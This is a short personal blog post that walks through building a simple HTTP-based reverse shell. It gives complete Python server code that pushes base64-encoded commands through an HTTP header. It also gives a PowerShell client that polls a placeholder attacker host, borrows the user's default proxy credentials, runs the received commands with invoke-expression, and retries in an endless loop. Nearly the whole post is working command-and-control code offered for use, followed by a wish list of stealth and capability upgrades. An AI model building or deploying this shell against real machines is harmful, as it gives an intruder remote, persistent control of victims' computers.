______ Y ______
My own personal time capsule.
creating simple http-based powershell reverse shell
February 4, 2015
Posted by on Truth is, its not that difficult. All you need are 2 components: client and server.
The server is relatively simple bit of python code that adds special header which then gets executed on the client side (base64 encoded)
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer import base64 PORT_NUMBER = 8080 class myHandler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) CMD = base64.b64encode(raw_input("CMD: >> ")) self.send_header('CMD',CMD) self.end_headers() self.wfile.write("<html><body>nothing to see here</body></html>") return try: server = HTTPServer(('', PORT_NUMBER), myHandler) server.serve_forever() except KeyboardInterrupt: print '^C received, shutting down the web server' server.socket.close()
The client, on the other hand just sit there to picks up the commands and execute them (it does not give any result back so its blind!). If it can’t connect it will retry in loop forever.
while (1 -eq 1){ try{ $url = "http://x.x.x.x:8080/p" # handle proxies and used default creds if needed $req = [System.Net.HttpWebRequest]::Create($url); $p=[System.Net.WebRequest]::GetSystemWebProxy(); $p.Credentials=[System.Net.CredentialCache]::DefaultCredentials; $req.proxy = $proxy # add our header $req.Headers.add('CMD','INITIAL') $res = $req.GetResponse(); $x = $res.GetResponseHeader("CMD"); # decode base64 $d = [System.Convert]::FromBase64String($x); $Ds = [System.Text.Encoding]::UTF8.GetString($d); # exec whatever we gave it (can be powershell or just shell commands) invoke-expression $Ds; $res.Close(); }catch{} }
I intended to improve it and add some features like:
* SSL
* Output transmission
* Ability to ‘run-as’
* error handling